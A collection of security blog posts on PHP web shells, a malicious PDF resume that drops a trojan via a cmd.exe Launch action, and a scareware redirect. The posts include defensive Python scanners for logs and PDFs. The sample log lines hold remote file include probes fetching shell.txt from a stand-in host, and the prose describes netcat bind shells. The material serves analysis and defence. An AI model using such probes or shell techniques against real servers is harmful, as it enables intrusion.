Zombies
Stories of zombies originated in the African Caribbean spiritual belief system of Voodoo, which told of the people being controlled as laborers by a powerful wizard.

In the beginning (php shells)

Posted: July 1st, 2010 | Author: Matt | Filed under: InfoSec, Research

In a galaxy far, far away….

I probably should have written this before the previous post but hey, if George Lucas can do it with Star Wars then I think I can wangle it on a blog post or two. Not that I’m comparing myself to old Mr. Lucas or anything….

So…PHP shells.

I have to thank Barry Irwin (@barryirwin) for most of the samples I now have in my collection. I had come across various shells in my ramblings around the Internet but it’s only while working on various phishing cases (I used to work for a large financial) that I came into a much wider variety.

The basic premise behind a PHP shell is to give a remote attacker a certain degree of control over a victim web server. There seem to be three common ways to “get shell” on a web server:

  1. Compromised FTP credentials
  2. A really crappy (old, unpatched) version of Joomla/WordPress/pick your favourite CMS
  3. Remote file include vulnerabilities (usually courtesy of #2)

So if you see things like this in your web server log files, start worrying:

This story is bad
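The log lines from that screenshot are gone, so here is an added example (my code, not the original post’s) of what to look for: a small Python scanner that parses Apache combined-format lines and flags the two tell-tales of attack methods 2 and 3 above, a query-string parameter carrying a remote URL (the classic remote file include probe, URL-encoded or not) and a PHP script being hit under a directory that should only hold uploads or images. The log lines are constructed using documentation IP ranges, and the directory list is a heuristic you would tune for your own site.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" log format; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)

# A parameter value that is itself a URL is the signature of a remote file include probe.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Heuristic (assumption, tune per site): PHP should never execute from these directories,
# so a hit like /images/uploads/x.php usually means a shell was uploaded there.
UPLOAD_DIR_PHP = re.compile(
    r"^/(?:images|uploads|upload|files|tmp|cache)/.*\.php\d?$", re.IGNORECASE
)


def analyze_line(line: str):
    """Return a list of (client_ip, reason) findings for one log line; empty if nothing stands out."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip = m["ip"]
    url = urlsplit(m["target"])
    findings = []
    # parse_qsl URL-decodes values, so http%3A%2F%2F... and plain http:// are both caught.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            findings.append(
                (ip, f"remote URL in parameter {key!r}: {value} (possible remote file include)")
            )
    if UPLOAD_DIR_PHP.match(url.path):
        findings.append(
            (ip, f"{m['method']} to PHP script under an upload directory: {url.path}")
        )
    return findings


def analyze_log(lines):
    """Run analyze_line over every line and flatten the findings."""
    return [finding for line in lines for finding in analyze_line(line)]


# Constructed sample lines (documentation IP ranges), not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jul/2010:10:12:33 +0200] "GET /index.php?page=http://198.51.100.7/shell.txt? HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jul/2010:10:12:40 +0200] "GET /index.php?page=http%3A%2F%2F198.51.100.7%2Fshell.txt%3F HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jul/2010:10:15:01 +0200] "POST /images/uploads/x.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [01/Jul/2010:10:16:12 +0200] "GET /index.php?page=about HTTP/1.1" 200 4211 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reason in analyze_log(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

The trailing `?` on the included URL is the give-away in the first two lines: it turns whatever the vulnerable script appends to the path into a harmless query string on the attacker’s server. A 200 on the POST in the third line is worse news than the probes, because it means the uploaded script actually ran.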

But we’re getting a little ahead of ourselves. We know a PHP shell is for remotely “controlling” a web server, but what is it in detail?

Most of the shells I have come across are a single PHP file, usually under 200 KB in size. Once it is on the server it is interpreted like any other PHP script, giving the attacker functions such as (but by no means limited to):

  • Uploading files
  • Changing permissions on existing files
  • A simple “command line” for running commands
  • A simple but effective file browser

The interface will look something like this:

As you can see the interface is pretty intuitive and gives loads of useful information about the target machine.

By simply clicking a few buttons or typing the odd command, you can execute commands and create directories and files to your heart’s content. But there’s a catch! (It’s not a very big catch at the end of the day.) You can only execute commands etc. with the privileges of the user that the web server is running as (usually apache/www-data/vpsserveruseraccount).

However, that’s not going to stop the attacker running netcat (which is on just about every version of *nix out there) on a high port (above 1024, so no root needed to bind it) and making a shell available on the local server. From there it’s trivial to escalate privileges from nobody to root. But that’s a story for another day.

Some of the nastier shells bundle a backdoor written in C or Perl which they drop onto the system. This either listens on a port offering a basic shell of sorts or, failing that, opens a reverse shell out to a server under the attacker’s control.

More malicious “plugins” include things like:

  • FTP/SSH brute forcers
  • MySQL / Database frontends

You’re only really limited by what you can code in PHP…

Obfuscation

Another trend that I’ve seen in a few of the more “31337” shells is the use of obfuscation within the code. Instead of a plain old PHP file, they use PHP’s built-in functions to obfuscate the code contained within. At the end of the day these are simple gzip or base64 encodings of the code (or a fun combination of the two). I’m not entirely sure why this happens. It can’t be for IDS evasion as the code is still interpreted and sent in the clear. It may be for server-side anti-virus evasion, but this seems unlikely as well. If anyone knows the reasoning behind this, please get in touch…

Here’s an example of some of the obfuscation I’ve seen…

Decoding these samples is fairly straightforward so I won’t bore you with the details here again :)

So, to wrap it all up, we have a simple PHP file that somehow ends up on a web server, giving the attacker a very easy-to-use interface to “manage” it. In my experience, I’ve only really seen these shells in use with phishing sites. One has to ask if it’s all part of the fraud ecosystem and if so, how it all fits together…but that’s a story for the sequel…or prequel perhaps…I don’t know…I don’t have a decent Jar-Jar character to ruin it all with…


Google, spammers and a malicious PDF

Posted: June 12th, 2010 | Author: Matt | Filed under: InfoSec, Research
How it all began.

Today I was trawling through my Gmail spam folder like a good little mail monkey when I came across a rather strange bit of spam. Usually you just get rubbish about making your manhood the size of a small country or the latest twitter/gmail support/facebook AV malware. Most of the time I just ignore the messages due to them being very boring and not really worth a coffee and a few hours in Terminal…
Today’s message was a little different. It was a very simple email with the subject line “New Resume” and one line in the body of the email saying “Please review my CV, Thank You!”. So, seeing as I have NO idea who the sender was and that there are no issues with the PDF format that I know of, I saved the PDF document to my desktop as I had a virtual machine I just knew the PDF would love immediately.

Original from Gmail

For what it’s worth, the email originated out of Korea / 121.50.250.98
Red Flag Number One
(As if a PDF document from an unknown person on your spam folder isn’t enough)


Before that though I fired up pdfid.py from @DidierStevens which told me there were two “OpenAction” items in the document (these turned out to be the Launch action type). So we know there are at least two possible malicious elements to this document. Next I fired up Vim (because I’m a die hard vim fan and would use it as a vehicle to get to the moon if I could). A quick scan of the document came up with a number of things I’d like to look into later:
  • /URI(mailto:a@foo.be)
  • /URI(http://www.foo.be/)
Note: I thought these first two items were just random noise that the attacker had placed into the document to make it look more legitimate, but as it turns out the document is actually a valid resume of Alexandre Dulaunoy (adulau). There were a couple of other references to Alexandre, I picked up on this one after parsing the document with pdf-parser.py

As it turns out, spammers had picked up his CV through a Google search and simply added the nasty payload to it. Kudos to Alexandre for putting up a message on his home page about the problem shortly after it started.
HUGE Red Flag Number Two
Object 81 (pdf-parser.py -f -o 81)


The Launch action type which runs “cmd.exe” with a bunch of VBS scripts should be more than enough evidence that this PDF is out to hurt someone…
Launch cmd.exe

Launch Action type

So clearly we have a malicious PDF document that’s using the Launch action to get the payload onto the machine and executed. Didier Stevens wrote Escape From PDF back in March and it’s already been used in the latest iterations of the Zeus bot. It seems someone has picked up on this and is using it in this PDF. The technique relies on the user allowing the Launch (cmd.exe) through the prompt that comes up when the PDF document is opened. The attacker has “obfuscated” the output a little, as can be seen here:
When the user clicks Open, the Launch action fires off cmd.exe which will then interpret the embedded VBScript files and drop the malicious payloads onto the machine. More on that later..
The funny thing to note here is that if you simply click “Do not open” the malicious code doesn’t execute. That is of course if the user hasn’t checked the box that says “Do not show this message again”…
You can even scroll up on this message window and see all the good stuff going on yourself:
Still, we can’t expect the user to be so savvy as to use the scroll bar and do a little reading now, can we?
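What pdfid.py and pdf-parser.py -o 81 turned up above can be reproduced in a few lines. The following is an added example (my code, not Didier Stevens’ tools) that scans raw PDF bytes for /OpenAction and /AA triggers and for action dictionaries with /S /Launch, then pulls out the /F (program) and /P (parameters) strings, including when they sit inside a /Win sub-dictionary or the name is written with #xx hex escapes (/L#61unch). The sample document is constructed inline with a harmless cmd.exe /c echo payload and no xref table. The scanner only looks at raw bytes, so objects inside compressed object streams or strings written in hex form are out of its reach, which is exactly where pdf-parser.py’s -f filtering comes in.

```python
import re

NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
LAUNCH = re.compile(rb"/S\s*/Launch(?![A-Za-z])")
# /F (file) and /P (parameters) as literal strings; hex strings <...> are deliberately not handled.
F_STR = re.compile(rb"/F(?![A-Za-z])\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)
P_STR = re.compile(rb"/P(?![A-Za-z])\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes in names so /L#61unch is seen as /Launch (applied file-wide; fine for scanning)."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def dict_spans(data: bytes):
    """Byte ranges (start, end) of every << ... >> dictionary, nested ones included."""
    spans, stack, i = [], [], 0
    while i < len(data) - 1:
        pair = data[i:i + 2]
        if pair == b"<<":
            stack.append(i)
            i += 2
        elif pair == b">>":
            if stack:
                spans.append((stack.pop(), i + 2))
            i += 2
        else:
            i += 1
    return spans


def innermost(spans, pos):
    """The smallest dictionary containing byte offset pos, i.e. the action dict itself."""
    containing = [s for s in spans if s[0] <= pos < s[1]]
    return min(containing, key=lambda s: s[1] - s[0]) if containing else None


def scan_pdf(raw: bytes) -> dict:
    """Count automatic-action triggers and describe every /Launch action found in the raw bytes."""
    data = normalize_names(raw)
    spans = dict_spans(data)
    report = {
        "openaction": len(re.findall(rb"/OpenAction(?![A-Za-z])", data)),
        "aa": len(re.findall(rb"/AA(?![A-Za-z])", data)),   # additional-actions (page/annotation triggers)
        "launch": [],
    }
    for m in LAUNCH.finditer(data):
        span = innermost(spans, m.start())
        body = data[span[0]:span[1]] if span else data[m.start():m.start() + 200]
        f, p = F_STR.search(body), P_STR.search(body)
        report["launch"].append({
            "offset": m.start(),
            "file": f.group(1).decode("latin-1") if f else None,
            "params": p.group(1).decode("latin-1") if p else None,
        })
    return report


# Constructed sample: just the objects a scanner sees, with a benign payload and no xref table.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /L#61unch /Win << /F (cmd.exe) /P (/c echo hello) >> >> endobj
5 0 obj << /Type /Action /S /Launch /F (calc.exe) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    report = scan_pdf(SAMPLE_PDF)
    print(f"/OpenAction: {report['openaction']}  /AA: {report['aa']}")
    for action in report["launch"]:
        print(f"/Launch at offset {action['offset']}: {action['file']} {action['params']}")
```

A non-zero /OpenAction count plus any /Launch entry is the combination seen in this sample: the document runs a program the moment it is opened, subject only to the reader’s prompt. Run it over a real file as `scan_pdf(open(path, "rb").read())`, and treat an empty result as “nothing in the clear”, not as clean.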
Virtual Machine Abuse.

So we have a PDF document that has malicious content. What do we do now?
We fire up VMware with a fairly unpatched version of Windows XP. I ran this PDF through Adobe Reader 8.2 and Foxit Reader 3.2. Foxit didn’t do anything as they have patched against the Launch action type.
Adobe was a slightly different story. While Adobe did prompt me as can be seen in the screenshots above, let’s pretend for a second that I am a normal user who doesn’t read dialogs at all and simply clicks Open, or that I had seen this dialog previously and had checked the little box that says “Do not show this message again”…
Clicking “Open” triggered the Launch action type and dropped vbs1.vbs onto my desktop (I believe this is because the PDF was originally on my desktop). You’ll remember that the vbs1.vbs script was included in the PDF document. Here’s what vbs1.vbs looks like:
vbs1.vbs
I haven’t had much chance to skill up on VBScript yet, but I believe the vbs1.vbs script creates a new file vbs2.vbs from the contents of the PDF document. I will confirm this once I’ve had some time to dig through both scripts a little more. It’s interesting to note that the second VBS file does look like it’s been obfuscated slightly. Either that or it’s just the way the file type is represented. If you have any input on this, please let me know…here’s a portion of vbs2.vbs:
vbs2.vbs
Once the two VBScript files had run, an EXE was dropped onto the desktop which was then executed. I believe this EXE to be included in the PDF document as the output from tcpdump doesn’t show any traffic going out to the Internet to fetch anything. This was the malicious payload. A quick scan with VirusTotal shows the executable to be Alureon or something similar. Quite a nasty trojan / DNS changer…I’ve chatted to Alexandre after the incident and he believes the dropper may be pulling different malware down each time it runs. I will probably test this over the weekend if I can find the time and bandwidth to do so.
After the bomb dropped.

So we now have a compromised machine with a trojan executable being run on the machine. I didn’t leave it to run for all that long as it’s probably not a wise thing to do. All of this through a PDF document that was opened on a Windows machine running a fairly old copy of Adobe Reader.
It’s interesting to note that the PDF document only had a detection rate of 31% on VirusTotal and a fairly common trojan was used as the payload (80% detection rate on VT). Why not use something a little simpler/quieter/APTier (sorry, I used APT)? I could be very wrong on this one. Perhaps the dropper does pull down different malware depending on what type of machine it’s run from.
When dealing with PDF documents you HAVE to have two tools by Didier Stevens: pdfid.py to identify the document and its contents, and pdf-parser.py to do the actual analysis. I also use vim to do a quick scan through the raw PDF.
On the Windows side, I used CaptureBAT to monitor file and registry changes. This just confirmed that cmd.exe was executing and creating the vbs1 and vbs2 files on the local machine.
I also copied the VBScript files and executable off the machine for later analysis. Thankfully AV was triggered during analysis (Microsoft Security Essentials) so we know it works (kind of). But then again, it triggered a little too late if you ask me.
I’m sure there’s a lesson to be learned somewhere in here but I am more concerned with having a cold beer at this point in time.
Thanks to the following people:
Gmail / Alexandre Dulaunoy / Didier Stevens / Mikko Hyppönen / Barry Irwin
MD5sums:
PDF Document: cff871a36828866de1f42574be016bb8
vbs1.vbs: 7897e6b5f2443d254a5890a28ef88079
vbs2.vbs: 25c926b0ac7285c627a3988f0a8e49d9
exe.exe: 069d17b209ebd4bb0f63365089154dc2

Blue hair dryers and Scareware.

Posted: November 26th, 2009 | Author: Matt | Filed under: InfoSec, Research, malware

start part 1/3

#include disclaimer.h

I am by no means an expert at this sort of thing. Nor am I very good at it. This post is just about what I found today and some of the steps I took in my investigation of the problem. If you see where I have gone wrong or spot a mistake, please let me know. It’s the only way I learn.

background


Someone was doing some research on a famous designer named Dieter Rams. In particular there was a blue hair dryer that caught said someone’s eye. This is mostly because his search terms brought the hair dryer to the number one result in Google Image Search. So, wanting to know more about the hair dryer, the user clicked on the image. It went steadily downhill from there.

javascript


The image result took him to a blog post which has the photo, along with some hidden JavaScript in the page source which looked a little like so:

Embedded Javascript

Unfortunately that little piece of the puzzle seems to be completely missing as it’s since been removed from the site. I am also a little confused as to how it got there in the first place. It wasn’t in a comment, nor was it an upload. My only thought is that it’s an existing link to a site which has since been compromised and is hosting malicious javascript…

the scan.

The first time I followed the link to the “Blue Hair Dryer of Doom” ™ I was redirected to pcmedicalbilling.com which then proceeded to tell me my machine was infected and needed to be scanned. I believe the redirection was handled by the above Javascript but without having the original source it’s hard to say. The scary thing about this is that I checked with Google and F-Secure and both said the link was good. It was only toward the end of the day that it finally got marked as malicious.

So upon loading the page you get presented with a neat little warning claiming shenanigans afoot on your PC. I love the fact that my browser now knows when my PC is infected with malware. Great work Safari!

Warning !

This will then kick off into a “scan” of your machine where it will find enough infections of various flavours to warrant you downloading something to deal with the problem.

Scanning your machine for infection

Here you can see your machine is truly infected and in desperate need of some software-assisted cleansing.

Oh noes!!! I'm infected....

And what do you know? They have just the application to help you out with this…

Help is on the way

Looking at the “scan” results page you can see how easily it would dupe Joe Bloggs. It’s pretty convincing. What bothers me most about this incident is that while the search terms may have been fairly specific to the user, who’s to say that this doesn’t happen much more often. There were no dodgy links being followed, no search for pornography, just a guy trying to do research for his job…

so we have an executable


We now have an executable downloaded to our machine. I haven’t had the time to reverse engineer it yet. Mostly because I haven’t had the chance to learn reverse engineering of PE files. Yet. There was a lot more code involved here. Some very interesting javascript which was fairly obfuscated. I will be posting about this once I have had the time to sit down and analyze the code. Look out for the follow up in the next couple of days…

end of part 1/3